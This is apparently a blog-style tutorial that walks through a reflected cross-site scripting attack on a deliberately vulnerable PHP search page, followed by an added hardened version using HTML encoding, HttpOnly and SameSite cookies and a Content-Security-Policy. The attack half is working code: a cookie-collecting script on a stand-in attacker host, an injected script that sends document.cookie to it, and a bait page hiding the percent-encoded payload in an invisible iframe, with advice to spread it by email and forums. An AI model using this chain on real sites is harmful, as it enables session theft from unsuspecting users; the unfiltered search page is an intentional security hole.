Wondering how powerful XSS can be and how to use it elegantly, I decided to implement a simple XSS attack scheme.

First, make an insecure site, say a search engine:

<?php
    // Uncomment these two lines to give the visitor some cookies to steal.
    //setcookie('username', 'Bob Smith');
    //setcookie('country', 'United States');

    // Render every cookie as key=value so the theft is easy to visualize.
    function get_cookie()
    {
        if (empty($_COOKIE))
            return 'No cookie';

        $result = '';
        foreach ($_COOKIE as $key => $value)
            $result = $result.$key.'='.$value.',';
        return $result;
    }

    // The vulnerability: the query is returned as-is and echoed into the
    // page below without any filtering or HTML encoding.
    function get_query()
    {
        if (isset($_GET['query']))
            return $_GET['query'];
        else
            return 'No query';
    }
?>
<html>
    <head>
        <title>A Weak Search Engine</title>
    </head>
    <body>
        <p>Cookie: <span id="cookie"><?php echo get_cookie();?></span></p>
        <p>Search Query: <span id="query"><?php echo get_query();?></span></p>
    </body>
</html>

This search engine shows the cookies (to make the result easy to see) and the search query (but no search results…). That’s a reasonable setting.

Why is this search engine insecure? Because it doesn’t filter the search query but displays it directly on the response page. Now we’ll exploit it. Without loss of generality, let its domain be search.example.com.

Now a malicious user can maintain a website mallory.example.com. On this site she hosts a PHP script steal.php:

<?php
    $fp = fopen('/tmp/mallory.txt', 'w');
    fwrite($fp, $_GET['cookie']);
    fclose($fp);

    $im = file_get_contents('/tmp/im.png');
    header('content-type: image/png');
    echo $im;
?>

steal.php records the ‘cookie’ parameter permanently (to a file on disk) and returns an image.

The purpose of steal.php becomes obvious once we introduce the search query:

newest laptop<script type="text/javascript">var i = document.createElement('img');i.src = 'http://mallory.example.com/steal.php?cookie='+document.cookie;</script>

We use the img tag because image requests are allowed to cross domains. If a logged-in user ever makes such a search query, his cookies will be stolen.

How do we entice the user into making such a query? By embedding the link inside a hidden iframe. We can build a very innocent-looking page that contains a hidden iframe. No client-side script is needed, so the same-origin policy for iframes doesn’t get in the way. As soon as the user activates the iframe by visiting the containing page, his cookies get stolen.

The enticing page is called bait.html, and it can reside on any server (it need not be search.example.com or mallory.example.com).

<html>
    <head>
        <title>An innocent page</title>
    </head>
    <body>
        <p>This page looks very innocent, doesn't it?</p>
        <iframe style="display:none;" src="http://search.example.com/?query=%6E%65%77%65%73%74%20%6C%61%70%74%6F%70%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%69%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%69%6D%67%27%29%3B%69%2E%73%72%63%20%3D%20%27%68%74%74%70%3A%2F%2F%6D%61%6C%6C%6F%72%79%2E%65%78%61%6D%70%6C%65%2E%63%6F%6D%2F%73%74%65%61%6C%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E"></iframe>
    </body>
</html>

The search query is percent-encoded so that it isn’t obvious that something bad is going on, even if the page source is viewed.

The whole attack goes as follows. Mallory spreads the page bait.html. If a user Bob, who has logged in to search.example.com before, visits bait.html, he activates the hidden iframe, thereby sending the malicious query to search.example.com and leaking his cookies. What’s even worse, he won’t notice anything on bait.html.

This is a traditional non-persistent (reflected) XSS attack, so called because the target website reflects the malicious query back to the browser.

The conclusion is that an XSS attack is very flexible and can be conducted in three steps. First, find a vulnerable page on the target website. Second, craft a malicious query. Third, hide the malicious query inside an innocent-looking page and spread it widely (via email, forums, etc.). Actually the third step looks more like CSRF; more precisely, CSRF is used to help XSS. If you have better ways to lure the victim into sending the malicious query, the first two steps suffice.
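For comparison, here is a hardened version of the search engine, added as an example (it is not the post's own code). It closes each step of the attack: the query is HTML-encoded before it is reflected, the cookies are HttpOnly (unreadable from document.cookie) and SameSite=Strict (not sent on the hidden cross-site iframe request), and a Content-Security-Policy header forbids inline scripts; the cookie display from the original page is dropped, and run from the command line the script feeds the post's own payload through the encoder as a self-check.

```php
<?php
// Hardened search engine (added example, not the post's code).
// 1. Cookies the injected script cannot read (HttpOnly) and that the browser
//    will not attach to cross-site subrequests such as the hidden iframe
//    (SameSite=Strict). The options-array form needs PHP >= 7.3.
function set_demo_cookies()
{
    $opts = ['path' => '/', 'secure' => true, 'httponly' => true, 'samesite' => 'Strict'];
    setcookie('username', 'Bob Smith', $opts);
    setcookie('country', 'United States', $opts);
}

// 2. Output encoding: <, >, &, " and ' become entities, so the reflected query
//    is rendered as text and can never open a <script> tag.
function encode_for_html($s)
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function get_query_safe()
{
    return isset($_GET['query']) ? encode_for_html($_GET['query']) : 'No query';
}

// Self-check from the command line: run the post's own payload through the
// encoder and confirm that no tag delimiter survives.
if (PHP_SAPI === 'cli') {
    $payload = 'newest laptop<script type="text/javascript">var i = document.createElement(\'img\');'
             . 'i.src = \'http://mallory.example.com/steal.php?cookie=\'+document.cookie;</script>';
    $out = encode_for_html($payload);
    if (strpos($out, '<') !== false || strpos($out, '>') !== false) {
        fwrite(STDERR, "encoding failed\n");
        exit(1);
    }
    echo $out, "\n";
    exit(0);
}

// 3. Defence in depth: a CSP without 'unsafe-inline' stops inline scripts even
//    if an encoding bug slips through somewhere else on the site.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'");
set_demo_cookies();
?>
<html>
    <head><title>A Hardened Search Engine</title></head>
    <body>
        <p>Search Query: <span id="query"><?php echo get_query_safe(); ?></span></p>
    </body>
</html>
```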

The related code is provided: link1 link2